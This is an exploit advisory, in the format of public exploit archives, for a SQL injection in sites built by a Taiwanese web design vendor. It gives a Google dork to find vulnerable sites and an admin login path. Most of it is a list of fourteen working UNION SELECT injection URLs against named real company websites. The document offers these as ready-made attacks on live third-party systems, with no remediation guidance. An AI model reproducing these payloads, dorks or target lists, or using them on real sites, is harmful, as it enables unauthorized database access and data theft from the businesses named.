######################
# Exploit Title : 百邇來 網頁設計 SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.buyersline.com.tw/
# Google Dork : intext:"網頁設計" inurl:news_detail.php
# Date: 2016 01 10
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# admin page : target/jobs/index_login.php
# demos :
# http://taiwan.spero.com.tw/news_detail.php?NNo=-3%27+union+select+1,2,3,version(),5,6,7,8--%20-
# http://www.looben.com.tw/news_detail.php?NNo=-15%27+union+select+1,2,3,version(),5,6,7,8,9,10--%20-
# http://www.fck.com.tw/news_detail.php?NNo=-3%27+union+select+1,2,3,version(),5,6,7,8,9--%20-
# http://www.algol.com.tw/news_detail.php?NNo=-17%27+union+select+1,2,3,version(),5,6,7,8,9--%20-
# http://www.ceramiccartridge.com.tw/news_detail.php?NNo=-13%27+union+select+1,2,3,version(),5,6,7,8,9--%20-
# http://www.lively-travel-thailand.com/news_detail.php?NNo=-168%27+union+select+1,2,3,version(),5,6,7,8,9,10--%20-
# http://www.young-spring.com/news_detail.php?NNo=-7%27+union+select+1,2,3,version(),5,6,7,8,9--%20-
# http://www.hsienchi.com.tw/news_detail.php?NNo=-17%27+union+select+1,2,3,version(),5,6,7,8,9,10--%20-
# http://www.thhpacking.com/news_detail.php?NNo=-7%27+union+select+1,2,3,version(),5,6,7,8,9--%20-
# http://www.kinetic.com.tw/news_detail.php?NNo=-13%27+union+select+1,2,3,version(),5,6,7,8,9--%20-
# http://www.jiujan.com.tw/news_detail.php?NNo=-10%27+union+select+1,2,3,version(),5,6,7,8,9--%20-
# http://www.tohoku.com.tw/news_detail.php?NNo=-15%27+union+select+1,2,3,version(),5,6,7,8,9--%20-
# http://www.yonghopumps.com/en/news_detail.php?NNo=-10%27+union+select+1,2,3,version(),5,6,7,8,9--%20-
# http://www.macaca.com.tw/news_detail.php?NNo=-14%27+union+select+1,2,3,version(),5,6,7,8,9--%20-
######################
# discovered by : modiret
######################
